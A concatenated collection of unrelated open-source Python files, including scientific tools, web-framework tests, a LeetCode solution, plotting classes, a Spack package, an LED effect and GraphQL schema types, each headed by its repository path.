main_ctrl(args): # pass base_call = load_base(args.base) cuteSV_call = load_cuteSV(args.cuteSV) sniffles_call = load_sniffles(args.sniffles) pbsv_call = load_pbsv(args.pbsv) svim_call = load_svim(args.svim) # for svtype in sniffles_call: # for chr in sniffles_call[svtype]: # for i in sniffles_call[svtype][chr]: # print(svtype, chr, i) cmp_callsets(base_call, cuteSV_call, 1, args.bias, args.offect) cmp_callsets(base_call, sniffles_call, 2, args.bias, args.offect) cmp_callsets(base_call, pbsv_call, 3, args.bias, args.offect) cmp_callsets(base_call, svim_call, 4, args.bias, args.offect) def main(argv): args = parseArgs(argv) setupLogging(False) # print args starttime = time.time() main_ctrl(args) logging.info("Finished in %0.2f seconds."%(time.time() - starttime)) def setupLogging(debug=False): logLevel = logging.DEBUG if debug else logging.INFO logFormat = "%(asctime)s [%(levelname)s] %(message)s" logging.basicConfig( stream=sys.stderr, level=logLevel, format=logFormat ) logging.info("Running %s" % " ".join(sys.argv)) if __name__ == '__main__': main(sys.argv[1:])
mindinsight/lineagemgr/common/utils.py
fapbatista/mindinsight
216
11096895
<filename>mindinsight/lineagemgr/common/utils.py # Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Lineage utils.""" import re from mindinsight.datavisual.data_transform.summary_watcher import SummaryWatcher def enum_to_list(enum): """Enum to list.""" return [enum_ele.value for enum_ele in enum] def get_timestamp(filename): """Get timestamp from filename.""" timestamp = int(re.search(SummaryWatcher().SUMMARY_FILENAME_REGEX, filename)[1]) return timestamp
stix_shifter_modules/msatp/tests/stix_translation/test_query_constructor_func.py
pyromaneact/stix-shifter
129
11096953
from stix_shifter_modules.msatp.stix_translation import query_constructor from stix_shifter_modules.msatp.stix_translation.query_constructor import QueryStringPatternTranslator import unittest class MergeDictTests(unittest.TestCase): def test_with_overlapping_keys(self): dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'} dict_02 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'} expected_res = {1: ['a', 'a'], 2: ['b', 'b'], 3: ['c', 'c'], 4: ['d', 'd']} self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result") def test_without_overlapping_keys(self): dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'} dict_02 = {5: 'e', 6: 'f', 7: 'g', 8: 'h'} expected_res = {1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g', 8: 'h'} self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result") def test_with_empty_map(self): dict_01 = {1: 'a', 2: 'b'} dict_02 = {} self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), dict_01, "incorrect result") class ConstructIntersecMap(unittest.TestCase): def test_non_empty_intersection(self): dict_01 = {1: 'a', 2: 'b', 3: 'c'} dict_02 = {1: 'a', 2: 'b', 4: 'd'} expected_res = {1: ['a', 'a'], 2: ['b', 'b']} self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), expected_res, "incorrect result") def test_empty_intersection(self): dict_01 = {1: 'a', 2: 'b', 3: 'c'} dict_02 = {4: 'd', 5: 'e', 6: 'f'} self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), {}, "incorrect result") def test_with_empty_map(self): dict_01 = {1: 'a', 2: 'b'} dict_02 = {} self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), dict_02, "incorrect result") def test_construct_and_op_map(self): test_mep_01 = {"DeviceNetworkEvents": 'DeviceName =~ "2.client-channel.google.com"', "DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'} test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'} expected_res = {"DeviceNetworkEvents": '(InitiatingProcessFileName =~ "demo-gthread-3.6.dll") and (DeviceName ' '=~ "2.client-channel.google.com")'} self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), expected_res, "incorrect result") def test_construct_and_op_map_with_empty_map(self): test_mep_01 = {} test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'} self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result") def test_construct_and_op_map_with_empty_intersec(self): test_mep_01 = {"DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'} test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'} self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result")
tests/apps/core/test_templates_richie_homepage.py
regisb/richie
174
11096960
""" Test suite for the Open Graph of the homepage """ import re from django.test.utils import override_settings from cms.test_utils.testcases import CMSTestCase from richie.apps.core.helpers import create_i18n_page class TemplatesRichieHomepageTestCase(CMSTestCase): """Testing the base.html template""" def test_templates_richie_homepage_meta_og_image(self): """ Test if the homepage has the default og:image logo """ homepage = create_i18n_page("my title", is_homepage=True) homepage.publish("en") url = homepage.get_absolute_url(language="en") response = self.client.get(url) response_content = response.content.decode("UTF-8") match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content) html_meta_og_image = match.group(0) self.assertIn( 'content="http://testserver/static/richie/images/logo.png', html_meta_og_image, ) self.assertIn("richie/images/logo.png", html_meta_og_image) @override_settings(STATIC_URL="https://xyz.cloudfront.net/static/") def test_templates_richie_homepage_meta_og_image_with_cdn(self): """ Test if the homepage has the default og:image logo when using a CDN """ homepage = create_i18n_page("my title", is_homepage=True) homepage.publish("en") url = homepage.get_absolute_url(language="en") response = self.client.get(url) response_content = response.content.decode("UTF-8") match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content) html_meta_og_image = match.group(0) self.assertIn( 'content="https://xyz.cloudfront.net/static/richie/images/logo.png', html_meta_og_image, ) self.assertIn("richie/images/logo.png", html_meta_og_image)
String/809. Expressive Words.py
beckswu/Leetcode
138
11096984
<filename>String/809. Expressive Words.py """ 809. Expressive Words Example: Input: S = "heeellooo" words = ["hello", "hi", "helo"] Output: 1 Explanation: We can extend "e" and "o" in the word "hello" to get "heeellooo". We can't extend "helo" to get "heeellooo" because the group "ll" is not extended. """ class Solution: def expressiveWords(self, S, words): """ :type S: str :type words: List[str] :rtype: int """ res = 0 for word in words: i = j = 0 while i<len(S): if j<len(word) and S[i] == word[j]: i+=1 j+=1 elif i+1<len(S) and S[i+1] == S[i] and i>0 and S[i] == S[i-1]: i+=1 elif not (i>1 and S[i] == S[i-1] == S[i-2]): break else: i+=1 if i == len(S) and j == len(word): res += 1 return res class Solution: def expressiveWords(self, S, words): def is_stretched(S, W): i, j, n, m = 0, 0, len(S), len(W) for i in range(n): if j < m and S[i] == W[j]: j += 1 elif S[i-1:i+2] != S[i]*3 != S[i-2:i+1]: return False return j == m return sum(is_stretched(S, w) for w in words) import itertools class Solution(object): def expressiveWords(self, S, words): """ :type S: str :type words: List[str] :rtype: int """ # Run length encoding def RLE(S): return zip(*[(k, len(list(grp))) for k, grp in itertools.groupby(S)]) R, count = RLE(S) result = 0 for word in words: R2, count2 = RLE(word) if R2 != R: continue result += all(c1 >= max(c2, 3) or c1 == c2 for c1, c2 in zip(count, count2)) return result
src/main.py
alpayuz/DeepDeblur-PyTorch
158
11097015
<reponame>alpayuz/DeepDeblur-PyTorch """main file that does everything""" from utils import interact from option import args, setup, cleanup from data import Data from model import Model from loss import Loss from optim import Optimizer from train import Trainer def main_worker(rank, args): args.rank = rank args = setup(args) loaders = Data(args).get_loader() model = Model(args) model.parallelize() optimizer = Optimizer(args, model) criterion = Loss(args, model=model, optimizer=optimizer) trainer = Trainer(args, model, criterion, optimizer, loaders) if args.stay: interact(local=locals()) exit() if args.demo: trainer.evaluate(epoch=args.start_epoch, mode='demo') exit() for epoch in range(1, args.start_epoch): if args.do_validate: if epoch % args.validate_every == 0: trainer.fill_evaluation(epoch, 'val') if args.do_test: if epoch % args.test_every == 0: trainer.fill_evaluation(epoch, 'test') for epoch in range(args.start_epoch, args.end_epoch+1): if args.do_train: trainer.train(epoch) if args.do_validate: if epoch % args.validate_every == 0: if trainer.epoch != epoch: trainer.load(epoch) trainer.validate(epoch) if args.do_test: if epoch % args.test_every == 0: if trainer.epoch != epoch: trainer.load(epoch) trainer.test(epoch) if args.rank == 0 or not args.launched: print('') trainer.imsaver.join_background() cleanup(args) def main(): main_worker(args.rank, args) if __name__ == "__main__": main()
python/ql/test/3/library-tests/modules/general/confused_elements/__init__.py
vadi2/codeql
4,036
11097027
from .a import b as a
rootpy/plotting/canvas.py
masonproffitt/rootpy
146
11097036
""" This module implements python classes which inherit from and extend the functionality of the ROOT canvas classes. """ from __future__ import absolute_import from .. import ROOT, QROOT, asrootpy from .base import convert_color from ..base import NamedObject from ..context import invisible_canvas from ..decorators import snake_case_methods from ..memory.keepalive import keepalive from array import array __all__ = [ 'Pad', 'Canvas', ] class _PadBase(NamedObject): # https://sft.its.cern.ch/jira/browse/ROOT-9007 # can remove this after 6.10/04 EmitVA = None def cd(self, *args): pad = asrootpy(super(_PadBase, self).cd(*args)) if pad and pad is not self: keepalive(self, pad) return pad def axes(self, ndim=1, xlimits=None, ylimits=None, zlimits=None, xbins=1, ybins=1, zbins=1): """ Create and return axes on this pad """ if xlimits is None: xlimits = (0, 1) if ylimits is None: ylimits = (0, 1) if zlimits is None: zlimits = (0, 1) if ndim == 1: from .hist import Hist hist = Hist(1, xlimits[0], xlimits[1]) elif ndim == 2: from .hist import Hist2D hist = Hist2D(1, xlimits[0], xlimits[1], 1, ylimits[0], ylimits[1]) elif ndim == 3: from .hist import Hist3D hist = Hist3D(1, xlimits[0], xlimits[1], 1, ylimits[0], ylimits[1], 1, zlimits[0], zlimits[1]) else: raise ValueError("ndim must be 1, 2, or 3") with self: hist.Draw('AXIS') xaxis = hist.xaxis yaxis = hist.yaxis if isinstance(xbins, (list, tuple)): xbins = array('d', xbins) if hasattr(xbins, '__iter__'): xaxis.Set(len(xbins) - 1, xbins) else: xaxis.Set(xbins, *xlimits) if ndim > 1: if isinstance(ybins, (list, tuple)): ybins = array('d', ybins) if hasattr(ybins, '__iter__'): yaxis.Set(len(ybins) - 1, ybins) else: yaxis.Set(ybins, *ylimits) else: yaxis.limits = ylimits yaxis.range_user = ylimits if ndim > 1: zaxis = hist.zaxis if ndim == 3: if isinstance(zbins, (list, tuple)): zbins = array('d', zbins) if hasattr(zbins, '__iter__'): zaxis.Set(len(zbins) - 1, zbins) else: zaxis.Set(zbins, *zlimits) else: zaxis.limits = zlimits zaxis.range_user = zlimits return xaxis, yaxis, zaxis return xaxis, yaxis @property def primitives(self): return asrootpy(self.GetListOfPrimitives()) def find_all_primitives(self): """ Recursively find all primities on a pad, even those hiding behind a GetListOfFunctions() of a primitive """ # delayed import to avoid circular import from .utils import find_all_primitives return find_all_primitives(self) @property def canvas(self): return asrootpy(self.GetCanvas()) @property def mother(self): return asrootpy(self.GetMother()) @property def margin(self): return (self.GetLeftMargin(), self.GetRightMargin(), self.GetBottomMargin(), self.GetTopMargin()) @margin.setter def margin(self, bounds): left, right, bottom, top = bounds super(_PadBase, self).SetMargin(left, right, bottom, top) @property def margin_pixels(self): left, right, bottom, top = self.margin width = self.width_pixels height = self.height_pixels return (int(left * width), int(right * width), int(bottom * height), int(top * height)) @margin_pixels.setter def margin_pixels(self, bounds): left, right, bottom, top = bounds width = float(self.width_pixels) height = float(self.height_pixels) super(_PadBase, self).SetMargin(left / width, right / width, bottom / height, top / height) @property def range(self): x1, y1 = ROOT.Double(), ROOT.Double() x2, y2 = ROOT.Double(), ROOT.Double() super(_PadBase, self).GetRange(x1, y1, x2, y2) return x1, y1, x2, y2 @range.setter def range(self, bounds): x1, y1, x2, y2 = bounds super(_PadBase, self).Range(x1, y1, x2, y2) @property def range_axis(self): x1, y1 = ROOT.Double(), ROOT.Double() x2, y2 = ROOT.Double(), ROOT.Double() super(_PadBase, self).GetRangeAxis(x1, y1, x2, y2) return x1, y1, x2, y2 @range_axis.setter def range_axis(self, bounds): x1, y1, x2, y2 = bounds super(_PadBase, self).RangeAxis(x1, y1, x2, y2) def __enter__(self): self._prev_pad = ROOT.gPad self.cd() return self def __exit__(self, type, value, traceback): # similar to preserve_current_canvas in rootpy/context.py if self._prev_pad: self._prev_pad.cd() elif ROOT.gPad: # Put things back how they were before. with invisible_canvas(): # This is a round-about way of resetting gPad to None. # No other technique I tried could do it. pass self._prev_pad = None return False @snake_case_methods class Pad(_PadBase, QROOT.TPad): _ROOT = QROOT.TPad def __init__(self, xlow, ylow, xup, yup, color=-1, bordersize=-1, bordermode=-2, name=None, title=None): color = convert_color(color, 'root') super(Pad, self).__init__(xlow, ylow, xup, yup, color, bordersize, bordermode, name=name, title=title) def Draw(self, *args): ret = super(Pad, self).Draw(*args) canvas = self.GetCanvas() keepalive(canvas, self) return ret @property def width(self): return self.GetWNDC() @property def height(self): return self.GetHNDC() @property def width_pixels(self): mother = self.mother canvas = self.canvas w = self.GetWNDC() while mother is not canvas: w *= mother.GetWNDC() mother = mother.mother return int(w * mother.width) @property def height_pixels(self): mother = self.mother canvas = self.canvas h = self.GetHNDC() while mother is not canvas: h *= mother.GetHNDC() mother = mother.mother return int(h * mother.height) @snake_case_methods class Canvas(_PadBase, QROOT.TCanvas): _ROOT = QROOT.TCanvas def __init__(self, width=None, height=None, x=None, y=None, name=None, title=None, size_includes_decorations=False): # The following line will trigger finalSetup and start the graphics # thread if not started already style = ROOT.gStyle if width is None: width = style.GetCanvasDefW() if height is None: height = style.GetCanvasDefH() if x is None: x = style.GetCanvasDefX() if y is None: y = style.GetCanvasDefY() super(Canvas, self).__init__(x, y, width, height, name=name, title=title) if not size_includes_decorations: # Canvas dimensions include the window manager's decorations by # default in vanilla ROOT. I think this is a bad default. # Since in the most common case I don't care about the window # decorations, the default will be to set the dimensions of the # paintable area of the canvas. if self.IsBatch(): self.SetCanvasSize(width, height) else: self.SetWindowSize(width + (width - self.GetWw()), height + (height - self.GetWh())) self.size_includes_decorations = size_includes_decorations @property def width(self): return self.GetWw() @width.setter def width(self, value): value = int(value) if self.IsBatch(): self.SetCanvasSize(value, self.GetWh()) else: curr_height = self.GetWh() self.SetWindowSize(value, curr_height) if not getattr(self, 'size_includes_decorations', False): self.SetWindowSize(value + (value - self.GetWw()), curr_height + (curr_height - self.GetWh())) @property def width_pixels(self): return self.GetWw() @width_pixels.setter def width_pixels(self, value): self.width = value @property def height(self): return self.GetWh() @height.setter def height(self, value): value = int(value) if self.IsBatch(): self.SetCanvasSize(self.GetWw(), value) else: curr_width = self.GetWw() self.SetWindowSize(curr_width, value) if not getattr(self, 'size_includes_decorations', False): self.SetWindowSize(curr_width + (curr_width - self.GetWw()), value + (value - self.GetWh())) @property def height_pixels(self): return self.GetWh() @height_pixels.setter def height_pixels(self, value): self.height = value
flaskerize/render.py
ehoeffner/flaskerize
119
11097038
<gh_stars>100-1000 import os import argparse from typing import Any, Callable, Dict, List, Optional import fs from termcolor import colored from flaskerize.parser import FzArgumentParser DEFAULT_TEMPLATE_PATTERN = ["**/*.template"] class SchematicRenderer: """Render Flaskerize schematics""" # Path to schematic files to copy, relative to top-level schematic_path DEFAULT_FILES_DIRNAME = "files" def __init__( self, schematic_path: str, src_path: str = ".", output_prefix: str = "", dry_run: bool = False, ): from jinja2 import Environment from flaskerize.fileio import StagedFileSystem self.src_path = src_path self.output_prefix = output_prefix self.schematic_path = schematic_path self.schematic_files_path = os.path.join( self.schematic_path, self.DEFAULT_FILES_DIRNAME ) self.schema_path = self._get_schema_path() self._load_schema() self.arg_parser = self._check_get_arg_parser() self.env = Environment() self.fs = StagedFileSystem( src_path=self.src_path, output_prefix=output_prefix, dry_run=dry_run ) self.sch_fs = fs.open_fs(f"osfs://{self.schematic_files_path}") self.dry_run = dry_run def _load_schema(self) -> None: if self.schema_path: import json with open(self.schema_path, "r") as fid: self.config = json.load(fid) else: self.config = {} def _get_schema_path(self) -> Optional[str]: schema_path = os.path.join(self.schematic_path, "schema.json") if not os.path.isfile(schema_path): return None return schema_path def _check_get_arg_parser( self, schema_path: Optional[str] = None ) -> FzArgumentParser: """Load argument parser from schema.json, if provided""" return FzArgumentParser(schema=schema_path or self.schema_path) def copy_from_sch(self, src_path: str, dst_path: str = None) -> None: """Copy a file from the schematic root to to the staging file system""" dst_path = dst_path or src_path dst_dir = os.path.dirname(dst_path) if not self.fs.render_fs.exists(dst_dir): self.fs.render_fs.makedirs(dst_dir) return fs.copy.copy_file( self.sch_fs, src_path, self.fs.render_fs, dst_path or src_path ) def get_static_files(self) -> List[str]: """Get list of files to be copied unchanged""" from pathlib import Path patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN) all_files = list(str(p) for p in Path(self.schematic_files_path).glob("**/*")) filenames = [os.path.relpath(s, self.schematic_files_path) for s in all_files] filenames = list(set(filenames) - set(self.get_template_files())) return filenames def get_template_files(self) -> List[str]: """Get list of templated files to be rendered via Jinja""" from pathlib import Path filenames = [] patterns = self.config.get("templateFilePatterns", DEFAULT_TEMPLATE_PATTERN) for pattern in patterns: filenames.extend( [str(p) for p in Path(self.schematic_files_path).glob(pattern)] ) ignore_filenames = self._get_ignore_files() filenames = list(set(filenames) - set(ignore_filenames)) filenames = [os.path.relpath(s, self.schematic_files_path) for s in filenames] return filenames def _get_ignore_files(self) -> List[str]: from pathlib import Path ignore_filenames = [] ignore_patterns = self.config.get("ignoreFilePatterns", []) for pattern in ignore_patterns: ignore_filenames.extend( [str(p) for p in Path(self.schematic_path).glob(pattern)] ) return ignore_filenames def _generate_outfile( self, template_file: str, root: str, context: Optional[Dict] = None ) -> str: # TODO: remove the redundant parameter template file that is copied # outfile_name = self._get_rel_path(full_path=template_file, rel_to=root) outfile_name = "".join(template_file.rsplit(".template")) tpl = self.env.from_string(outfile_name) if context is None: context = {} return tpl.render(**context) def render_from_file(self, template_path: str, context: Dict) -> None: outpath = self._generate_outfile(template_path, self.src_path, context=context) outdir, outfile = os.path.split(outpath) rendered_outpath = os.path.join(self.src_path, outpath) rendered_outdir = os.path.join(rendered_outpath, outdir) if self.sch_fs.isfile(template_path): # TODO: Refactor dry-run and file system interactions to a composable object # passed into this class rather than it containing the write logic # with open(template_path, "r") as fid: with self.sch_fs.open(template_path, "r") as fid: tpl = self.env.from_string(fid.read()) with self.fs.open(outpath, "w") as fout: fout.write(tpl.render(**context)) def copy_static_file(self, filename: str, context: Dict[str, Any]): from shutil import copy # If the path is a directory, need to ensure trailing slash so it does not get # split incorrectly if self.sch_fs.isdir(filename): filename = os.path.join(filename, "") outpath = self._generate_outfile(filename, self.src_path, context=context) outdir, outfile = os.path.split(outpath) rendered_outpath = os.path.join(self.src_path, outpath) rendered_outdir = os.path.join(rendered_outpath, outdir) if self.sch_fs.isfile(filename): self.copy_from_sch(filename, outpath) def print_summary(self): """Print summary of operations performed""" print( f""" Flaskerize job summary: {colored("Schematic generation successful!", "green")} Full schematic path: {colored(self.schematic_path, "yellow")} """ ) self.fs.print_fs_diff() def _load_run_function(self, path: str) -> Callable: from importlib.util import spec_from_file_location, module_from_spec spec = spec_from_file_location("run", path) module = module_from_spec(spec) spec.loader.exec_module(module) if not hasattr(module, "run"): raise ValueError(f"No method 'run' function found in {path}") return getattr(module, "run") def _load_custom_functions(self, path: str) -> None: import os from flaskerize import registered_funcs from importlib.util import spec_from_file_location, module_from_spec if not os.path.exists(path): return spec = spec_from_file_location("custom_functions", path) module = module_from_spec(spec) spec.loader.exec_module(module) for f in registered_funcs: self.env.globals[f.__name__] = f def render(self, name: str, args: List[Any]) -> None: """Renders the schematic""" context = vars(self.arg_parser.parse_args(args)) if "name" in context: raise ValueError( "Collision between Flaskerize-reserved parameter " "'name' and parameter found in schema.json corresponding " f"to {self.schematic_path}" ) context = {**context, "name": name} self._load_custom_functions( path=os.path.join(self.schematic_path, "custom_functions.py") ) try: run = self._load_run_function( path=os.path.join(self.schematic_path, "run.py") ) except (ImportError, ValueError, FileNotFoundError) as e: run = default_run run(renderer=self, context=context) self.fs.commit() def default_run(renderer: SchematicRenderer, context: Dict[str, Any]) -> None: """Default run method""" template_files = renderer.get_template_files() static_files = renderer.get_static_files() # TODO: add test that static files are correctly removed from template_files, etc for filename in template_files: renderer.render_from_file(filename, context=context) for filename in static_files: renderer.copy_static_file(filename, context=context) renderer.print_summary()
var/spack/repos/builtin/packages/intel-oneapi-vtune/package.py
BenWibking/spack
2,360
11097046
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) import platform from spack import * class IntelOneapiVtune(IntelOneApiPackage): """Intel oneAPI VTune Profiler. Installed in Perf driverless mode, detailed here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-cookbook/top/configuration-recipes/profiling-hardware-without-sampling-drivers.html Users can manually install drivers, please read the instructions here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-help/top/set-up-analysis-target/linux-targets/building-and-installing-the-sampling-drivers-for-linux-targets.html """ maintainers = ['rscohn2'] homepage = 'https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/vtune-profiler.html' if platform.system() == 'Linux': version('2022.0.0', url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18406/l_oneapi_vtune_p_2022.0.0.94_offline.sh', sha256='aa4d575c22e7be0c950b87d67d9e371f470f682906864c4f9b68e530ecd22bd7', expand=False) version('2021.7.1', url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18086/l_oneapi_vtune_p_2021.7.1.492_offline.sh', sha256='4cf17078ae6e09f26f70bd9d0b726af234cc30c342ae4a8fda69941b40139b26', expand=False) version('2021.6.0', url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18012/l_oneapi_vtune_p_2021.6.0.411_offline.sh', sha256='6b1df7da713337aa665bcc6ff23e4a006695b5bfaf71dffd305cbadca2e5560c', expand=False) @property def component_dir(self): return 'vtune'
examples/python-base64.py
alexmv/go-camo
161
11097063
# Copyright (c) 2012-2019 <NAME> # Use of this source code is governed by an MIT-style # license that can be found in the LICENSE file. import hashlib import hmac import base64 CAMO_HOST = 'https://img.example.com' def camo_url(hmac_key, image_url): if image_url.startswith("https:"): return image_url b64digest = base64.urlsafe_b64encode( hmac.new(hmac_key, image_url, hashlib.sha1).digest()).strip('=') b64url = base64.urlsafe_b64encode(image_url).strip('=') requrl = '%s/%s/%s' % (CAMO_HOST, b64digest, b64url) return requrl print camo_url("test", "http://golang.org/doc/gopher/frontpage.png") # 'https://img.example.org/D23vHLFHsOhPOcvdxeoQyAJTpvM/aHR0cDovL2dvbGFuZy5vcmcvZG9jL2dvcGhlci9mcm9udHBhZ2UucG5n'
effects/pacman.py
Bosken85/hyperion.ng
1,808
11097070
import hyperion, time from random import randint #get args rotationTime = float(hyperion.args.get('rotationTime', 4)) marginPos = float(hyperion.args.get('margin-pos', 2)) # define pacman pacman = bytearray((255, 255, 0)) # define ghosts redGuy = bytearray((255, 0, 0)) pinkGuy = bytearray((255, 184, 255)) blueGuy = bytearray((0, 255, 255)) slowGuy = bytearray((255, 184, 81)) light = bytearray((255, 184, 174)) background = bytearray((0, 0, 0)) #helper posPac = 1 diffPac = 6*marginPos diffGuys = 3*marginPos sleepTime = max(0.02,rotationTime/hyperion.ledCount) posPinkGuy = posPac + diffPac posBlueGuy = posPinkGuy + diffGuys posSlowGuy = posBlueGuy + diffGuys posRedGuy = posSlowGuy + diffGuys # initialize the led data ledDataEscape = bytearray() for i in range(hyperion.ledCount): if i == 1: ledDataEscape += pacman elif i == posPinkGuy: ledDataEscape += pinkGuy elif i == posBlueGuy: ledDataEscape += blueGuy elif i == posSlowGuy: ledDataEscape += slowGuy elif i == posRedGuy: ledDataEscape += redGuy else: ledDataEscape += background ledDataChase = bytearray() for i in range(hyperion.ledCount): if i == 1: ledDataChase += pacman elif i in [posPinkGuy, posBlueGuy, posSlowGuy, posRedGuy]: ledDataChase += bytearray((33, 33, 255)) else: ledDataChase += background # increment = 3, because LED-Color is defined by 3 Bytes increment = 3 def shiftLED(ledData, increment, limit, lightPos=None): state = 0 while state < limit and not hyperion.abort(): ledData = ledData[increment:] + ledData[:increment] if (lightPos): tmp = ledData[lightPos] ledData[lightPos] = light hyperion.setColor(ledData) if (lightPos): ledData[lightPos] = tmp time.sleep(sleepTime) state += 1 # start the write data loop while not hyperion.abort(): # escape mode ledData = ledDataEscape shiftLED(ledData, increment, hyperion.ledCount) random = randint(10,hyperion.ledCount) # escape mode + power pellet s = slice(3*random, 3*random+3) shiftLED(ledData, increment, hyperion.ledCount - random, s) # chase mode shift = 3*(hyperion.ledCount - random) ledData = ledDataChase[shift:]+ledDataChase[:shift] shiftLED(ledData, -increment, 2*hyperion.ledCount-random) time.sleep(sleepTime)
app/jwt_utils.py
ristekoss/susunjadwal-backend
155
11097103
<filename>app/jwt_utils.py import jwt from flask import current_app as app def encode_token(data): return jwt.encode(data, app.config["SECRET_KEY"], algorithm='HS256').decode() def decode_token(token): try: data = jwt.decode(token, app.config["SECRET_KEY"], algorithm='HS256') except: return None return data
examples/python/main.py
timfjord/sublime_debugger
225
11097104
import time from threading import Thread import sys import os print(sys.version) # print(os.environ) def some_random_variables(): string = "abc" integer = 1 floating = 2.345 array = [string, integer, floating] table = { 'string': string, 'intger': integer, 'float': floating, 'array': array, } print(string) print(integer) print(floating) print(array) print(table) def test(): some_random_variables() def sleep(duration): print("Sleeping thread for {}".format(duration)) time.sleep(duration) threads = [] for i in range(1, 5): thread = Thread(name='Thread #{}'.format(i), target=sleep, args=(i/2.0,)) thread.start() threads.append(thread) some_lambda = lambda: test() some_lambda() for thread in threads: thread.join() print('Done')
api/integrations/slack/permissions.py
mevinbabuc/flagsmith
1,259
11097112
<filename>api/integrations/slack/permissions.py from rest_framework.permissions import BasePermission from environments.models import Environment class OauthInitPermission(BasePermission): def has_permission(self, request, view): environment = Environment.objects.get( api_key=view.kwargs.get("environment_api_key") ) return request.user.is_environment_admin(environment)
scvi/_utils.py
njbernstein/scvi-tools
398
11097130
from textwrap import dedent def _doc_params(**kwds): """\ Docstrings should start with "\" in the first line for proper formatting. """ def dec(obj): obj.__orig_doc__ = obj.__doc__ obj.__doc__ = dedent(obj.__doc__).format_map(kwds) return obj return dec
tests/utils/test_dbus.py
pnjongang/supervisor
597
11097142
"""Check dbus-next implementation.""" from dbus_next.signature import Variant from supervisor.coresys import CoreSys from supervisor.utils.dbus import DBus, _remove_dbus_signature def test_remove_dbus_signature(): """Check D-Bus signature clean-up.""" test = _remove_dbus_signature(Variant("s", "Value")) assert isinstance(test, str) assert test == "Value" test_dict = _remove_dbus_signature({"Key": Variant("s", "Value")}) assert isinstance(test_dict["Key"], str) assert test_dict["Key"] == "Value" test_dict = _remove_dbus_signature([Variant("s", "Value")]) assert isinstance(test_dict[0], str) assert test_dict[0] == "Value" async def test_dbus_prepare_args(coresys: CoreSys): """Check D-Bus dynamic argument builder.""" dbus = DBus("org.freedesktop.systemd1", "/org/freedesktop/systemd1") signature, args = dbus._prepare_args( True, 1, 1.0, "Value", ("a{sv}", {"Key": "Value"}) ) assert signature == "bidsa{sv}"
python_modules/dagster-graphql/dagster_graphql/schema/pipelines/pipeline_run_stats.py
dbatten5/dagster
4,606
11097149
import graphene from dagster import check from dagster.core.storage.pipeline_run import PipelineRunStatsSnapshot from ..errors import GraphenePythonError class GraphenePipelineRunStatsSnapshot(graphene.ObjectType): id = graphene.NonNull(graphene.String) runId = graphene.NonNull(graphene.String) stepsSucceeded = graphene.NonNull(graphene.Int) stepsFailed = graphene.NonNull(graphene.Int) materializations = graphene.NonNull(graphene.Int) expectations = graphene.NonNull(graphene.Int) enqueuedTime = graphene.Field(graphene.Float) launchTime = graphene.Field(graphene.Float) startTime = graphene.Field(graphene.Float) endTime = graphene.Field(graphene.Float) class Meta: name = "PipelineRunStatsSnapshot" def __init__(self, stats): self._stats = check.inst_param(stats, "stats", PipelineRunStatsSnapshot) super().__init__( id="stats-" + self._stats.run_id, runId=self._stats.run_id, stepsSucceeded=self._stats.steps_succeeded, stepsFailed=self._stats.steps_failed, materializations=self._stats.materializations, expectations=self._stats.expectations, enqueuedTime=stats.enqueued_time, launchTime=stats.launch_time, startTime=self._stats.start_time, endTime=self._stats.end_time, ) class GraphenePipelineRunStatsOrError(graphene.Union): class Meta: types = (GraphenePipelineRunStatsSnapshot, GraphenePythonError) name = "PipelineRunStatsOrError"
tomviz/python/ReinterpretSignedToUnsigned.py
sankhesh/tomviz
284
11097168
